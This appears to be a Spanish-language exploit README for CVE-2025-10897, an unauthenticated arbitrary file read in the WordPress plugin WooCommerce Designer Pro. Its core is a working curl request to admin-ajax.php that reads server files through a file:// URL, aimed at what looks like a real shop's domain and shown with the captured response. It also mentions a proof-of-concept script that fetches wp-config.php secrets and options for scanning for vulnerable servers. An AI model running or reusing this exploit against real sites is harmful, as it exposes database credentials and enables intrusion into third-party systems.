
WooCommerce Designer Pro <= 1.9.28 - Lectura arbitraria de archivos sin autenticación
WooCommerce es un plugin de comercio electrónico de código abierto para WordPress que convierte sitios web en tiendas en línea. WooCommerce Designer Pro es un plugin de WordPress desarrollado por JMA Plugins que permite a los clientes diseñar y personalizar productos directamente en tiendas WooCommerce.
IMPORTANTE: WooCommerce y WooCommerce Designer Pro son completamente diferentes.
WooCommerce Designer Pro permite crear tarjetas de visita, postales, volantes, pósteres, pegatinas y otros materiales imprimibles con funciones como compatibilidad con colores CMYK, generación de PDF y una interfaz de diseño basada en lienzo. El plugin se integra con WooCommerce para permitir la personalización de productos en tiempo real antes de la compra, lo que lo hace adecuado para negocios de impresión en línea y tiendas de productos personalizados.
CVE-2025-10897 es una lectura arbitraria de archivos sin autenticación en WooCommerce Designer Pro versiones hasta 1.9.28 (CWE-22). Un atacante envía POST /wp-admin/admin-ajax.php con action=wcdp_convert_resource_cmyk y una URL file:// que apunta a archivos del servidor, como /etc/passwd o wp-config.php. El plugin devuelve el contenido del archivo en la respuesta JSON. Esto puede filtrar contraseñas de bases de datos y otros secretos de wp-config.php sin necesidad de tener una cuenta de WordPress.
SOLICITUD
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
-H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: */*' \
-H 'Connection: close' \
-d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'
RESPUESTA
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}
Respuesta decodificada en Base64:
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"
ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01
python CVE-2025-10897-X7.py
NOTA: Nuestro script PoC intenta obtener wp-config.php, pero el objetivo podría tener WordPress instalado en una ruta distinta de /var/www.
Argumentos para buscar servidores vulnerables
Este repositorio y su contenido se proporcionan estrictamente para investigación de seguridad legítima, pruebas de penetración autorizadas, estudio educativo y fines defensivos. Al acceder o utilizar este material, usted reconoce la responsabilidad total de garantizar que sus actividades cumplan con todas las leyes aplicables y que haya obtenido la autorización adecuada antes de probar o aplicar estas técnicas contra cualquier sistema que no sea de su propiedad.
Los autores y mantenedores de este proyecto no asumen ninguna responsabilidad por daños, consecuencias legales o uso indebido derivados de la aplicación de esta información. Cualquier uso para acceso no autorizado, actividad maliciosa o fines ilegales está expresamente prohibido y no cuenta con soporte.
Úselo con responsabilidad. Manténgase dentro de la ley. Pruebe solo lo que le pertenece o sobre lo que tenga permiso explícito por escrito para probar.
SCT-PL